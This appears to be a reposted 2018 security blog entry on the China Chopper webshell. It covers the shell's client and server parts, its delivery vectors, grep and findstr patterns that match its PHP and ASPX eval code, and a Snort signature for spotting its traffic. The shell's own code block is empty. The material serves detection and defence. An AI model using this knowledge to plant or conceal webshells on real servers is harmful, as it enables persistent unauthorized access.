# China Chopper webshell
Copied from Andrea Fortuna's website;
## What is the China Chopper Webshell, and how to find it on a compromised system?
March 28, 2018
Some days ago, during a chat with a friend who works in a small software development company, the webshells topic has come up.
During the migration of a production system, my friend found some suspicious **.php** files, which turned out to be **China Chopper webshells**.
**A simple software upgrade turned into a cybersecurity nightmare.**
### What is China Chopper?
**China Chopper** is a **4KB** Web shell first discovered in **2012**.
It is widely used by Chinese and other malicious actors, including **APT** groups, to remotely access compromised Web servers.
The webshell consists mainly of two parts, the client interface (**caidao.exe**) and a small file placed on the compromised web server.
#### Why this webshell is so dangerous and hard to find?
The file dropped on the compromised server is really small.\
For example, the **PHP** version (the file found by my friend) is composed by a single line of code:
```
```
Also with a limited acces to the compromized host, is very simple for an attacker to push this small code into a file.
So, all the logic is delegated to the client (**caidao.exe**) that communicates directly with the file dropped on webserver and provides a lot of interesting feature, like a **File explorer**, a **DataBase client,** an **interactive command shell** and a **“Security Scan”** useful to perform brute-force password guessing against authentication portals.
An analysis of **caidao.exe** is available here:
The China Chopper can run on any web server that is capable of running **JSP**, **ASP**, **ASPX**, **PHP**, or **CFM**, on both **Windows** and **Linux**.
Due to the size of the malware’s payload, delivery mechanism can be very flexible, for example:
* WebDAV file upload
* **JBoss jmx-console** or **Apache Tomcat** management pages
* Cross-site scripting (**XSS**)
* **SQL** injection
* Vulnerabilities in applications/services
* File processing vulnerabilities
* Remote file include (**RFI**) and local file include (**LFI**) vulnerabilities
* Lateral propagation from other access
**This OS and application flexibility makes this an even more dangerous Web shell.**
### How can i detect this webshell on my webserver?
The quickest and easiest method is using regular expressions.\
On a linux machine, an egrep across your Web directory can help identify infected files (for **.PHP** version):
```
egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php
```
On a Windows machine, you can search files using regular expressions by using the native findstr command:
```
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
```
and for **.aspx** version:
```
findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
```
### How detect the malicious network traffic?
You can use a **Snort IDS** signature [published by FireEye](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf):
```
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)
```
### References
* [http://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html](https://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html)
*
*
*
*